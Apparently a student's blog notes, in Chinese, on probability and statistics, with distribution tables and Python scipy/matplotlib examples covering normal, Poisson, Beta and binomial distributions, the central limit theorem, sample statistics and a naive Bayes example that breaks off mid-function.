| $P\{X=k\}=C^{k}_{n}p^{k}q^{n-k}$ | binomial distribution | $X\sim B(n,p)$ | $np$ | $np(1-p)$ | the event {X=k} is "event A occurs exactly k times in n trials" |
| $P\{X=k\}=pq^{k-1}$ | geometric distribution | $X\sim GE(p)$ | $\frac{1}{p}$ | $\frac{1-p}{p^2}$ | the probability that the first success in a sequence of Bernoulli trials occurs on trial k |
| $P\{X=k\}=\frac{C^{k}_{M}C^{n-k}_{N-M}}{C^{n}_{N}}$ | hypergeometric distribution | $X\sim H(N,n,M)$ | | | the number of objects of a designated kind obtained when drawing n objects without replacement from N objects, M of which are of that kind |
| $P\{X=k\}=\frac{\lambda^k}{k!}e^{-\lambda}$ | Poisson distribution | $X\sim \pi(\lambda)$ | $\lambda$ | $\lambda$ | suits the number of random events per unit time; can approximate the binomial (accurate mainly when $p \le 0.1$) |

• Continuous:

| Density function | Name | Notation | Expectation $E(X)$ | Variance $D(X)$ | Notes |
| --- | --- | --- | --- | --- | --- |
| $f(x)=\frac{1}{b-a}$ for $a<x<b$; 0 otherwise | uniform distribution | $X\sim U(a,b)$ | $\frac{a+b}{2}$ | $\frac{(b-a)^2}{12}$ | also called the rectangular distribution |
| $f(x;\mu,\sigma)=\frac{1}{\sqrt{2\pi \sigma^2}}e^{-\frac{(x-\mu)^2}{2\sigma^2}}$ | normal distribution | $X\sim N(\mu,\sigma^2)$ | $\mu$ | $\sigma^2$ | |
| $f(x)=\lambda e^{-\lambda x}$ for $x>0$; 0 otherwise | exponential distribution | $X\sim E(\lambda)$ | $\frac{1}{\lambda}$ | $\frac{1}{\lambda^2}$ | the only "memoryless" continuous distribution: given that $x>s$, $P(x>s+t)=P(x>t)$ |
| $f(x;n)=\frac{1}{2^{\frac{n}{2}}\Gamma(\frac{n}{2})}x^{\frac{n}{2}-1}e^{-\frac{x}{2}}$ for $x>0$; 0 for $x\le 0$ | chi-squared distribution | $U\sim \chi^2(n)$ | $n$ | $2n$ | |
| | t distribution | $Z\sim t(n)$ | 0 (the density is even) | | $X\sim N(0,1)$, $Y\sim \chi^2(n)$ independent, $t=\frac{X}{\sqrt{Y/n}}$; as $n\to \infty$ it approaches the standard normal |
| | F distribution | $F\sim F(n_{1},n_{2})$ | | | with $U\sim \chi^2(n_{1})$, $V\sim \chi^2(n_{2})$ independent, $F=\frac{U/n_{1}}{V/n_{2}}$ |
| | $\Gamma$ distribution | $X\sim \Gamma(\alpha,\beta)$ | | | the exponential and chi-squared distributions are both special cases of the gamma distribution |
| | beta distribution | $X\sim Beta(\alpha,\beta)$ | $\frac{\alpha}{\alpha+\beta}$ | $\frac{\alpha\beta}{(\alpha+\beta)^2(\alpha+\beta+1)}$ | can be viewed as a distribution over probabilities: $x$ is an estimate of the probability of some random event, and $\alpha-1$ and $\beta-1$ count how many times the event did and did not occur |

9.1.3 Computing the Normal Distribution with Python Libraries

1. Generating normal random variables

from scipy.stats import norm

print(norm.rvs(), end="\n\n")  # one draw from the standard normal (mean 0, std 1)

print(norm.rvs(size=10), end="\n\n")  # 10 draws from the standard normal

print(norm.rvs(loc=10, scale=0.1), end="\n\n")  # one draw from a normal with mean 10 and std 0.1
-0.15606449742155645

[ 1.41915385e+00  9.05180924e-01 -1.65805601e+00 -8.70872873e-05
  6.25728572e-01  3.07949177e+00  5.22917613e-01 -6.20181230e-01
 -1.23960758e+00  7.47657082e-02]

9.901121362547995

2. Computing normal probabilities

from scipy.stats import norm

print("P(X < 0.3) = {}".format(norm.cdf(0.3)))

print("P(-0.2 < X < 0.2) = {}".format(norm.cdf(0.2) - norm.cdf(-0.2)))
P(X < 0.3) = 0.6179114221889526
P(-0.2 < X < 0.2) = 0.15851941887820603

3. Plotting the standard normal distribution

import numpy as np
import scipy.stats as stats
import matplotlib.pyplot as plt
import matplotlib.style as style
import matplotlib as mpl
from IPython.core.display import HTML

# PLOTTING CONFIG
# %matplotlib inline is an IPython magic usable directly in IPython; it embeds
# the figures inline so that the final plt.show() can be omitted. Without it,
# plt.show() must be called to display the figure.
%matplotlib inline
mpl.rcParams["font.sans-serif"] = ["Microsoft YaHei"]
mpl.rcParams['axes.unicode_minus'] = False
style.use('fivethirtyeight')
plt.rcParams["figure.figsize"] = (14, 7)
plt.figure(dpi=100)  # set the resolution to 100 dpi

# PDF (probability density function)
plt.plot(np.linspace(-4, 4, 100),
         stats.norm.pdf(np.linspace(-4, 4, 100))
         / np.max(stats.norm.pdf(np.linspace(-3, 3, 100))),
         )
plt.fill_between(np.linspace(-4, 4, 100),
                 stats.norm.pdf(np.linspace(-4, 4, 100))
                 / np.max(stats.norm.pdf(np.linspace(-3, 3, 100))),
                 alpha=.15,
                 )
# CDF (cumulative distribution function)
plt.plot(np.linspace(-4, 4, 100),
         stats.norm.cdf(np.linspace(-4, 4, 100)),
         )

# LEGEND
plt.text(x=-1.5, y=.7, s="pdf (normed)", rotation=65,
         alpha=.75, weight="bold", color="#008fd5")
plt.text(x=-.4, y=.5, s="cdf", rotation=55, alpha=.75,
         weight="bold", color="#fc4f30")

# TICKS
plt.tick_params(axis='both', which='major', labelsize=18)
plt.axhline(y=0, color='black', linewidth=1.3, alpha=.7)

# TITLE
plt.text(x=-5, y=1.25, s="Normal distribution - overview",
         fontsize=26, weight='bold', alpha=.75)
plt.text(x=-5, y=1.1,
         s=('Below: the normalized probability density function (pdf) and the cumulative '
            'distribution function (cdf) of the normal random variable $ y \sim \mathcal{N}(\mu,\sigma) $, '
            'with $ \mu = 0 $, $ \sigma = 1$.'),
         fontsize=19, alpha=.85)
Text(-5, 1.1, 'Below: the normalized probability density function (pdf) and the cumulative distribution function (cdf) of the normal random variable $ y \\sim \\mathcal{N}(\\mu,\\sigma) $, with $ \\mu = 0 $, $ \\sigma = 1$.')

(Figure: normalized pdf and cdf of the standard normal distribution)

9.3 The Poisson Distribution

When n in the binomial distribution is large and p is small, the binomial is approximately Poisson, which reduces the amount of computation:

$$P\{X=k\}=C^{k}_{n}\left(\frac{\lambda}{n}\right)^k\left(1-\frac{\lambda}{n}\right)^{n-k}\approx \frac{\lambda^k}{k!}e^{-\lambda}$$

If $X$ follows the binomial distribution $b(n, p)$ with parameters $n,p$, then $X$ approximately follows the Poisson distribution with parameter $\lambda=np$.

The Poisson distribution suits the number of occurrences of a random event within a period of time (or region of space), e.g. the number of people arriving at a subway station within some interval. A quick numerical check follows.
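The following sketch (my own illustration; the parameters are assumptions) compares the binomial pmf with its Poisson approximation for large n and small p:

from scipy import stats

# Minimal sketch: binomial pmf vs. the Poisson approximation with lambda = n * p
n, p = 1000, 0.005
lam = n * p
for k in range(0, 11, 2):
    print(k, stats.binom.pmf(k, n, p), stats.poisson.pmf(k, lam))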

9.6 The Beta Distribution

The Beta distribution can be seen as a distribution over probabilities. The inference involved is a posterior probability, which Bayes' formula converts into a computation in terms of the prior:

$$f(p|X=k)=\frac{P(X=k|p)f(p)}{P(X=k)}$$

Definition 9.8: Given parameters $\alpha>0$ and $\beta>0$, a random variable $x$ with values in $[0,1]$ has the Beta probability density

$$Beta(x;\alpha,\beta)=\frac{1}{B(\alpha,\beta)}x^{\alpha-1}(1-x)^{\beta-1}$$

where $B(\alpha,\beta)$ is the Beta function, which can be written as

$$B(\alpha, \beta)=\frac{\Gamma(\alpha)\Gamma(\beta)}{\Gamma(\alpha+\beta)}$$

The Beta distribution has the following properties (a conjugacy sketch follows this list):

• Beta(1, 1) is the same as U(0, 1)

• As a distribution over probabilities, $Beta(x;\alpha,\beta)$ necessarily integrates to 1 over x

• x is in fact an estimate of the probability of some random event, and $\alpha-1$ and $\beta-1$ count how many times the event did and did not occur

• The Beta distribution is a distribution whose posterior has the same distributional form as its prior; only the parameters change

• The Beta distribution can be viewed as the result of repeatedly running binomial experiments, and it lets us compute the distribution of the probability of a random event
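The conjugacy property is easy to sketch (my own illustration; the counts are assumptions, chosen to mirror the baseball example below): starting from the flat prior Beta(1, 1) = U(0, 1) and observing k successes in n Bernoulli trials, the posterior is Beta(1 + k, 1 + n - k).

from scipy import stats

# Minimal sketch: Beta posterior after k successes in n trials, flat prior
k, n = 82, 302                   # e.g. 82 hits in 302 at-bats (assumed numbers)
posterior = stats.beta(1 + k, 1 + n - k)
print(posterior.mean())          # posterior mean of the hit rate
print(posterior.interval(0.95))  # a 95% credible interval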

9.7 Worked Example: Estimating a Baseball Player's Hit Rate

# IMPORTS
import numpy as np
import scipy.stats as stats
import matplotlib.pyplot as plt
import matplotlib.style as style
from IPython.core.display import HTML

# PLOTTING CONFIG
%matplotlib inline
style.use('fivethirtyeight')
plt.rcParams["figure.figsize"] = (14, 7)

plt.figure(dpi=100)

# PDF
# 82 hits, 220 misses
plt.plot(np.linspace(0, 1, 500),
         stats.beta.pdf(np.linspace(0, 1, 500), a=82, b=220), label='a=82,b=220',
         linewidth=1
         )

# 84 hits, 220 misses
plt.plot(np.linspace(0, 1, 500),
         stats.beta.pdf(np.linspace(0, 1, 500), a=84, b=220), label='a=84,b=220',
         linewidth=2, linestyle='dashed'
         )

# 182 hits, 420 misses
plt.plot(np.linspace(0, 1, 500),
         stats.beta.pdf(np.linspace(0, 1, 500), a=182, b=420), label='a=182,b=420',
         linewidth=3
         )

# AXIS LABELS
plt.xlabel('X', size=20)
plt.ylabel('Density of Beta', size=20)

# TICKS
plt.tick_params(axis='both', which='major', labelsize=18)
plt.xticks(np.linspace(0, 1, 11))

# SHOW LEGEND
plt.legend()

plt.show()

(Figure: Beta densities for the three parameter settings)

9.9 Exercises

(1) Let the normal random variable $X\sim N(0,1)$ satisfy $P\{X < x_{1}\}=0.1$ and $P\{X < x_{2}\}=0.05$; the corresponding $x_{1}$ and $x_{2}$ are called lower quantiles of the normal distribution. Find $x_{1}$ and $x_{2}$.

$x_{1} = \Phi^{-1}(0.1)$

$x_{2} = \Phi^{-1}(0.05)$

from scipy.stats import norm

x1 = norm.ppf(0.1)  # inverse of the cumulative distribution function
x2 = norm.ppf(0.05)
x1, x2
(-1.2815515655446004, -1.6448536269514729)

(2) For the standard normal distribution $X\sim N(0,1)$, plot the density curve and the lower 0.05 quantile

import matplotlib.pyplot as plt
from scipy.stats import norm
import numpy as np

plt.plot(np.linspace(-3, 3, 100), norm.pdf(np.linspace(-3, 3, 100)))  # density curve
plt.fill_between(np.linspace(-3, norm.ppf(0.05), 50),
                 norm.pdf(np.linspace(-3, norm.ppf(0.05), 50)),
                 alpha=.15,
                 )
x0 = norm.ppf(0.05)  # the lower 0.05 quantile
y0 = norm.pdf(x0)    # density value at the quantile
plt.plot([x0, x0], [y0, 0], 'k--', lw=2.5)  # dashed black line at the quantile
plt.annotate("x2= %.2f" % x0, xy=(x0, y0), xycoords='data', xytext=(+30, +30),
             textcoords='offset points', fontsize=16, arrowprops=dict(arrowstyle='->',
             connectionstyle='arc3, rad=.2'))  # annotation

plt.show()  # display the figure


(Figure: standard normal density with the region below the 0.05 quantile shaded)


7 Describing Statistical Regularities 1: Foundations of Probability Theory

7.1.3 Probability and Frequency

Example 7.3: Tossing coins

Toss a coin 10 times and count how often it lands heads up; write a Python program to observe the relationship between the frequency of the event and its probability as the number of tosses grows.

import random


def coin_trial():
    """
    Simulate 10 coin tosses.
    """
    heads = 0  # number of heads
    for i in range(10):
        if random.random() <= 0.5:
            heads += 1
    return heads


def simulate(n):
    """
    Simulate 10 * n coin tosses.
    """
    trials = []
    for i in range(n):
        trials.append(coin_trial())
    return(sum(trials) / n)
simulate(1)
6.0
simulate(10)
4.5
simulate(100)
4.92
simulate(1000)
5.053
simulate(10000)
5.0029
simulate(100000)
5.01412

7.4.1 Discrete Random Variables

Example 7.13: Finding the probability mass function and the distribution function

A company's product wins a prize with probability 50%. Find the probability mass function and the distribution function of the number of winning items when buying 4 of the same product. (Bernoulli trials)

Buying 4 of the same product is a sequence of n Bernoulli trials. Let the random variable X be the number of winning items, p the probability of winning, and q the probability of not winning. Then $P_{n}(X = k) = C^{k}_{n}p^{k}q^{n-k}$ with $p = \frac{1}{2}$, $q = \frac{1}{2}$.

| Value of X | 0 | 1 | 2 | 3 | 4 |
| --- | --- | --- | --- | --- | --- |
| Probability $p_{k}$ | $\frac{1}{16}$ | $\frac{1}{4}$ | $\frac{3}{8}$ | $\frac{1}{4}$ | $\frac{1}{16}$ |

The distribution function is as follows (a quick scipy check follows below):

$F(0) = P(X = 0) = \frac{1}{16}$

$F(1) = P(X = 0) + P(X = 1) = \frac{5}{16}$

$F(2) = P(X = 0) + P(X = 1) + P(X = 2) = \frac{11}{16}$

$F(3) = P(X = 0) + P(X = 1) + P(X = 2) + P(X = 3) = \frac{15}{16}$

$F(4) = P(X = 0) + P(X = 1) + P(X = 2) + P(X = 3) + P(X = 4) = 1$
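The table and the values of F can be verified quickly with scipy (my own check, not part of the book's listing):

from scipy import stats

# Minimal sketch: X ~ B(4, 0.5); print the pmf and cdf at each value
for k in range(5):
    print(k, stats.binom.pmf(k, 4, 0.5), stats.binom.cdf(k, 4, 0.5))
# pmf: 0.0625 0.25 0.375 0.25 0.0625; cdf: 0.0625 0.3125 0.6875 0.9375 1.0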

Example 7.14: Plotting the probability mass function and the distribution function of Example 7.13 in Python

import numpy as np
from scipy import stats
import matplotlib.pyplot as plt
from matplotlib.font_manager import FontProperties
from collections import Counter

# rcParams configuration
plt.rcParams["font.sans-serif"] = ["Microsoft YaHei"]
# if True, the minus sign is rendered as a Unicode character instead of a hyphen;
# see http://en.wikipedia.org/wiki/Plus_and_minus_signs#Character_codes
plt.rcParams['axes.unicode_minus'] = False

def Discrete_pmf():
    xk = np.arange(5)  # all possible values of X: [0 1 2 3 4]
    pk = (1 / 16, 1 / 4, 3 / 8, 1 / 4, 1 / 16)  # probability mass function
    # name: instance name 'custm'; values: a tuple of two array-likes (xk, pk),
    # where xk are integers and pk are probabilities in (0, 1] with sum(pk) = 1;
    # xk and pk must have the same shape.
    dist = stats.rv_discrete(name='custm', values=(xk, pk))
    rv = dist.rvs(size=100)  # rvs: draw 100 random numbers from the distribution
    fig, (ax0, ax1) = plt.subplots(ncols=2, figsize=(10, 5))  # two panels: ax0, ax1

    ax0.set_title("Probability mass function")
    ax0.plot(xk, pk, 'ro', ms=8, mec='r')  # points: x = xk, y = pk, red dots of size 8
    ax0.vlines(xk, 0, pk, colors='r', linestyles='-', lw=2)  # red solid stems of width 2
    for i in xk:  # annotate the values
        ax0.text(i, pk[i], '%.3f' % pk[i], ha='center', va='bottom')

    ax1.set_title("Distribution function")
    pk1 = dist.cdf(xk)  # cdf: cumulative distribution function
    # rv: the sample data (the histogram heights follow this sample, so the
    #     annotated theoretical values may not match the bars exactly)
    # 5 bins (values 0-4); density=True normalizes the histogram area to 1
    # histtype: 'bar', 'barstacked', 'step', or 'stepfilled'
    # cumulative=True accumulates the frequencies
    ax1.hist(rv, 5, density=True, histtype='step', facecolor='blue',
             alpha=0.75, cumulative=True)  # .hist draws the histogram
    for i in xk:  # annotate the values
        ax1.text(i, pk1[i], '%.3f' % pk1[i], ha='center', va='bottom')
    print(Counter(rv))


if __name__ == "__main__":
    Discrete_pmf()

Counter({1: 30, 3: 30, 2: 28, 4: 7, 0: 5})

(Figure: probability mass function and distribution function of Example 7.13)

7.4.2 Continuous Random Variables

Example 7.16: The normal distribution

Print the probability density function ${\color{Red}{f(x)}}$ and the corresponding distribution function ${\color{Blue}{F(x)}}$ of the normal distribution in Python.

If a random variable X has the probability density function below, X is called a normal random variable, written $X\sim N(\mu, \sigma^{2})$:

${\color{Red}{f(x)}} = \frac{1}{\sqrt{2\pi}\sigma}e^{-\frac{(x-\mu)^2}{2\sigma^2}}, -\infty < x < +\infty$

The code below simulates a normal distribution with mean $\mu = 0$ and variance $\sigma^2 = 1$.

import numpy as np
from numpy import pi
import matplotlib.pyplot as plt
import scipy.stats as stats


def test_norm_pmf():
    mu = 0  # mean 0
    sigma = 1  # standard deviation 1 (so the variance is also 1)
    x = np.arange(-5, 5, 0.1)  # values of the random variable x
    fig, (ax0, ax1) = plt.subplots(ncols=2, figsize=(10, 5))

    # probability density function
    y0 = (1 / ((np.sqrt(2 * pi) * sigma))) * np.exp(-(((x - mu) ** 2)) / (2 * sigma * sigma))  # f(x)
    ax0.plot(x, y0)
    ax0.set_title('Normal: $\mu$ = %.1f, $\sigma^2$ = %.1f' % (mu, sigma))
    ax0.set_xlabel('x')
    ax0.set_ylabel('Probability density', fontsize=15)

    # cumulative distribution function
    y1 = stats.norm.cdf(x, 0, 1)  # F(x)
    ax1.plot(x, y1)
    ax1.set_title('Normal: $\mu$ = %.1f, $\sigma^2$ = %.1f' % (mu, sigma))
    ax1.set_xlabel('x')
    ax1.set_ylabel('Cumulative density', fontsize=15)

    fig.subplots_adjust(wspace=0.4)
    plt.show()


if __name__ == "__main__":
    test_norm_pmf()

(Figure: probability density function and distribution function of N(0, 1))

7.8 Expert Tips

Python has a very good package for statistical inference: stats in SciPy. The module provides random variables for many probability distributions, together with a variety of common statistical functions. The common methods are listed below (a usage sketch follows the table):

| Method | Meaning | Full name | Notes |
| --- | --- | --- | --- |
| rvs | random variates | Random variates of given size | draws random numbers following the given distribution |
| pdf | probability density function | Probability Density Function | for continuous random variables: $P(a<X\le b)=\int_{a}^{b} f(x)dx$ |
| pmf | probability mass function | Probability Mass Function | for discrete random variables, i.e. the distribution law $f(x)=P\{X = x_{k}\}$ |
| cdf | cumulative distribution function | Cumulative Distribution Function | also called the distribution function, $P(X \le x)$ |
| ppf | percent point function | Percent point function | the inverse of cdf |
| sf | survival function | Survival function | |
| stats | | | returns the expectation and variance (mean(), var()) |
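A short sketch of the methods above (my own example), using the standard normal distribution:

from scipy import stats

print(stats.norm.rvs(size=3))   # rvs: three random draws
print(stats.norm.pdf(0))        # pdf: density at 0 (~0.3989)
print(stats.norm.cdf(1.96))     # cdf: P(X <= 1.96) (~0.975)
print(stats.norm.ppf(0.975))    # ppf: inverse of cdf (~1.96)
print(stats.norm.sf(1.96))      # sf: 1 - cdf (~0.025)
print(stats.norm.stats())       # (mean, variance) = (0.0, 1.0)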

Common distribution functions (a usage sketch of two of them follows the table):

| Name | Meaning |
| --- | --- |
| beta | beta distribution |
| f | F distribution |
| gamma | gamma distribution |
| poisson | Poisson distribution |
| hypergeom | hypergeometric distribution |
| lognorm | log-normal distribution |
| binom | binomial distribution |
| uniform | uniform distribution |
| chi2 | chi-squared distribution |
| cauchy | Cauchy distribution |
| laplace | Laplace distribution |
| rayleigh | Rayleigh distribution |
| t | Student's t distribution |
| norm | normal distribution |
| expon | exponential distribution |
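All of these share the same method interface; here is a sketch with two entries from the table (my own example, with assumed parameters):

from scipy import stats

print(stats.binom.pmf(3, n=10, p=0.5))  # P{X = 3} for X ~ B(10, 0.5)
print(stats.expon.cdf(1.0, scale=2.0))  # P(X <= 1) for rate 1/2 (scale = 1/lambda)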

Example 7.23: Getting the usage documentation of the norm functions

The normal random functions:

from scipy import stats
from scipy.stats import norm

print(norm.__doc__)

Example 7.24: Creating normal random variables and plotting them

from scipy import stats
from scipy.stats import norm
import numpy as np
import pylab as plt

X = norm()
Y = norm(loc=1.0, scale=2.0)  # normal with mean 1.0 and standard deviation 2.0
t = np.arange(-10, 10, 0.01)
plt.plot(t, X.pdf(t), label='$X$', color="red")
plt.plot(t, Y.pdf(t), "b--", label="$Y$")
plt.legend()
plt.show()

(Figure: density curves of X and Y)

7.9 Exercises

(1) The Poisson distribution

A road crossing is known to have on average 2 accidents per day. Write a Python program to find the probabilities of 0, 1, 2, 3, and 4 accidents there in one day.

$P(X=r)=\frac{e^{-\lambda} \lambda^{r}}{r!}$, where r is the number of events occurring in the given interval and $\lambda$ is the average number of events per interval.

| $X_{i}$ | 0 | 1 | 2 | 3 | 4 |
| --- | --- | --- | --- | --- | --- |
| $P(X=X_{i})$ | $e^{-2}$ | $2e^{-2}$ | $2e^{-2}$ | $\frac{4}{3}e^{-2}$ | $\frac{2}{3}e^{-2}$ |
import numpy as np
from scipy import stats
import matplotlib.pyplot as plt

# make Chinese characters display correctly
plt.rcParams['font.sans-serif'] = ['SimHei']
plt.rcParams['axes.unicode_minus'] = False

# define the random variable
mu4 = 2  # mean: 2 accidents per day
# number of accidents: 0, 1, 2, 3, or 4
X4 = np.arange(0, 5, 1)
pList4 = stats.poisson.pmf(X4, mu4)  # poisson: Poisson distribution; pmf: distribution law of a discrete variable
print(pList4)
# plot
plt.plot(X4, pList4, marker='o', linestyle='None', alpha=0.75)
plt.vlines(X4, 0, pList4, alpha=0.75)
plt.xlabel('Number of accidents k at the crossing')
plt.ylabel('Probability')
for i in X4:  # annotate the values
    plt.text(i, pList4[i], '%.3f' % pList4[i], ha='center', va='bottom')
plt.title('Poisson distribution: mean mu=%i' % mu4)
plt.show()

[0.13533528 0.27067057 0.27067057 0.18044704 0.09022352]

(Figure: Poisson probabilities of 0-4 accidents per day)

    8 描述统计规律 2——随机变量与概率统计

    • 从这章开始学的有点吃力了,原因是考研的数学二不考概统+本科期间概统没好好学。在重新看了几天川大徐后,开始入手。

    • 我认为这本书在这里的排版不太好,与教科书的顺序一致,内容上也涉及了很多第 9 章的内容。

    切比雪夫不等式

    $P{\left | X - \mu \right | \ge \varepsilon }\le \frac{\sigma2}{\varepsilon2}(\forall \varepsilon >0)$

    $X$落入以均值$\mu$为中心的$\varepsilon$邻域$(\mu - \varepsilon,\mu + \varepsilon)$的概率不低于$1-\frac{\sigma2}{\varepsilon2}$

    8.2 大数定律和中心极限定理

    8.2.1 大数定律

    对命题"当大量重复某一相同实验的时候, 其最后的实验结果可能会稳定在某一数值附近"给予严格论证.

    名称描述
    切比雪夫大数定律独立不同分布, 当 n 充分大时, n 个相互独立的随机变量的算术平均值将比较密集地聚集在它的数学期望附近
    辛钦大数定律独立同分布(切比雪夫大数定律的推论)
    伯努利大数定律一个事件 A 在 n 次独立重复实验中发生的频率$\frac{n _ {A}}{n}$依概率收敛于事件 A 发生的概率 p

    8.2.2 中心极限定理

    在一定条件下, 充分多的相互独立的随机变量的算术平均值将服从正态分布, 不管这些随机变量本身服从什么分布.

    名称描述
    列维——林德伯格独立同分布
    李雅普诺夫独立不同分布
    棣莫弗——拉普拉斯二项分布,独立同分布的特殊情况,表明正态分布是二项分布的极限分布
    定理 8.1 独立同分布的中心极限定理

    前 n 项和$S _ {n}=\Sigma ^{n} _ {k=1}X _ {k} \sim N(n\mu, n\sigma ^2)$

    算数平均值$\bar X = \frac {1}{n}\Sigma ^{n} _ {k=1}X _ {k} \sim N(\mu, \frac {\sigma ^2}{n})$

    算术平均值的标准化$Y _ {n} = \frac {\bar{X}-\mu}{\sigma / \sqrt{n}} \sim N(0,1)$

    无论{$X _ {k}$}服从什么分布,当 n 很大时,其前 n 项的算术平均值$\bar X$的标准化{$Y _ {k}$}服从正态分布 N(0,1)

    定理 8.2 棣莫弗——拉普拉斯定理

    设$X \sim b(n,p)$, 则当 n 很大时

    $P{a < x \le b}\approx \Phi(\frac{b-np}{\sqrt{np(1-p)}})-\Phi(\frac{a-np}{\sqrt{np(1-p)}})$

    • 我们曾用泊松分布近似地计算二项分布($p \le 0.1$时精确度较好), 而以上结论不受 p 值的大小限制

    • 当$n \ge 50$时, 上述正态分布的近似程度可以达到比较满意的精度, n 越大, 精度越高.

    例 8.13 验证中心极限定理

    设有$n$个随机变量$X _ {1},X _ {2},…,X _ {n}$相互独立,并服从$U\left [a,b\right ]$, 则
    $\bar X = \frac{1}{n}\Sigma^{n} _ {k=1}X _ {k}\sim N\left [ \frac{a+b}{2},\frac{(b-a)^2}{12n}\right]$

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    import numpy as np
    import matplotlib.pyplot as plt
    import matplotlib as mpl
    from scipy import stats

    # 解决汉字显示
    mpl.rcParams["font.sans-serif"] = ["Microsoft YaHei"]
    mpl.rcParams["axes.unicode_minus"] = False

    f = plt.figure(figsize=(16, 8))
    mean, var = 0.5, 1.0/12 # [0, 1]范围内的均匀分布的均值和方差


    def p_norm(nvr):
    """
    绘制正态分布曲线
    """
    mu = mean
    sigma = np.sqrt(var/nvr)
    norm_dis = stats.norm(mu, sigma) # 定义正态分布对象
    norm_x = np.linspace(0, 1, 128) # 定义域
    pdf = norm_dis.pdf(norm_x) # f(X)
    plt.plot(norm_x, pdf, 'r', alpha=0.6, label='N(${0:.1f}, {1:.2f}^2$)'.format(mu, sigma))
    plt.legend(loc='upper left', prop={'size': 8})


    def sample(rv_num):
    """
    对随机变量(X1+X2+...)进行一次采样
    :return: 这些样本的平均值
    """
    single_sample_dist = stats.uniform(loc=0, scale=1) # 定义[0, 1]上的均匀分布对象
    x = 0
    for j in range(rv_num):
    x += single_sample_dist.rvs()
    x *= 1 / rv_num
    return x


    def plotHist(Sample_num, rv_num, n_):
    """
    画出 n 个随机变量和样本的直方图
    :param Sample_num: 样本数目
    :param rv_num: 随机变量的个数
    :param n_: 图例序号
    """
    x = np.zeros((Sample_num))
    sp = f.add_subplot(2, 2, n_)
    for i in range(Sample_num): # 采样 Sample_num 次
    x[i] = sample(rv_num)
    # 画出直方图
    plt.hist(x, 500, density=True, color='#348ABD', label='{}个随机变量'.format(rv_num))
    plt.setp(sp.get_yticklabels(), visible=False)
    # 画出正态分布曲线
    p_norm(rv_num)


    if __name__ == "__main__":
    Sample_num = 1000
    nvr = ([1, 2, 32, 64])
    for i in range(np.size(nvr)):
    plotHist(Sample_num, nvr[i], i + 1)
    plt.suptitle("服从均匀分布 U[0, 1]的多个随机变量和的均值逼近于正态分布")
    plt.show()

    png

    8.3 数理统计基本概念

    • 概率论中, 我们是在假设随机变量的分布已知的前提下去研究它的规律性, 但在数理统计中, 研究的随机变量分布是未知

    • 数理统计中, 通过对研究的随机变量进行重复独立地观察, 得到大量观察数据后进行统计分析(如数据是否服从某种分布, 其数据特征(数学期望, 方差等)如何, 从而对所研究的随机变量的分布做出种种推断)

    8.4 常用的统计量

    例 8.15 求样本的均值、方差和标准差的 3 种方法

    1
    2
    3
    4
    5
    6
    7
    import numpy as np
    from math import sqrt

    # 生成样本数据
    nlist = range(0, 9_000_000)
    nlist = [float(i) / 1_000_000 for i in nlist]
    N = len(nlist)
    (1)定义法
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    sum1 = 0.0  # 样本数据之和
    sum2 = 0.0 # 样本数据平方和
    for i in range(N):
    sum1 += nlist[i]
    sum2 += nlist[i] ** 2
    mean = sum1 / N # 平均值
    var = sum2 / N - mean ** 2 # 方差 D(X) = E(X ^ 2) - [E(X)] ^ 2
    std = sqrt(var) # 标准差 ^ 2 = 方差

    mean, var, std
    (4.499999500000001, 6.750000000000028, 2.5980762113533213)
    (2)借助 Numpy 的向量运算
    1
    2
    3
    4
    5
    6
    7
    8
    9
    narray = np.array(nlist)
    sum1 = narray.sum()
    narray2 = narray * narray # 就这?
    sum2 = narray2.sum()
    mean = sum1 / N
    var = sum2 / N - mean ** 2
    std = sqrt(var)

    mean, var, std
    (4.4999994999999995, 6.749999999999915, 2.5980762113532996)
    (3)借助 Numpy 函数
    1
    2
    3
    4
    5
    mean = np.mean(nlist)
    var = np.var(nlist)
    std = np.std(nlist)

    mean, var, std
    (4.4999994999999995, 6.749999999999914, 2.5980762113532996)

    8.4 最大似然估计(MLE)

    • 对于已经出现的样本值$x _ {1}, x _ {2},…,x _ {n}$,适当地选取参数$\theta$, 使实验结果出现的概率最大

    • 似然函数$L(x|\theta)$是不确定的, $L(x _ {1}, x _ {2}, …, x _ {n} | \theta )$是既定事实(模型已定, 参数未知)

    • $L(x _ {1}, x _ {2}, …, x _ {n} | \theta )$发生的概率为$\Pi ^{n} _ {i=1}\theta ^ {x _ {i}}(1-\theta)^{1-x _ {i}})$

    • 通过对$\theta$求导等方式, 求出当$\theta$为何值时, $L(x _ {1}, x _ {2}, …, x _ {n} | \theta )$发生的概率最大

    • 参考视频: 【概率统计】最大似然估计

    8.5 最大后验估计(MAP)

    • 在最大似然估计的基础上, 添加了先验信息, 在样本较少时有用

    • $argmax \left [{\color{Red} {ln p(\theta)} + {\color{Blue}{\Sigma ^{n} _ {i=1}ln p(x _ {i}|\theta)}}} \right ]$, 先验项 + 与 MLE 等效, 利用求导等方式, 判断当$\theta$为何值时, 原式最大

    • 参考视频: 极大似然与最大后验的关系-贝叶斯法的视频超分辨率

    8.6 综合实例 1——贝叶斯用户满意度预测

    1.问题描述

    根据一些已有的汽车汽车评测满意度测评数据集,可初步了解用户对于该类型汽车的满意程度。

    2.数据准备阶段

    特征属性属性值属性说明
    Buyingvhigh, high, med, low买入价
    Maintvhigh, high, med, low维护费
    Doors2,3,4,5more车门数
    Personsvhigh, high, med, low可容纳人数
    Lug-bootsmall, med, big后备箱大小
    Safetylow, med, high安全性
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    import numpy as np
    import random
    import pandas as pd

    # 列名 = [买入价, 维护费, 车门数, 可容纳人数, 后备箱大小, 安全性, 汽车类别]
    columnsName=['buying', 'maint', 'doors', 'persons','lug-boot','safety','label']


    def getDataSet(file):
    """
    从数据集中获得数据
    """
    fr = open(file)
    rdata = []
    for line in fr.readlines():
    tmp = line.strip().split(',') # 这个文件以逗号分割数据
    rdata.append(tmp)
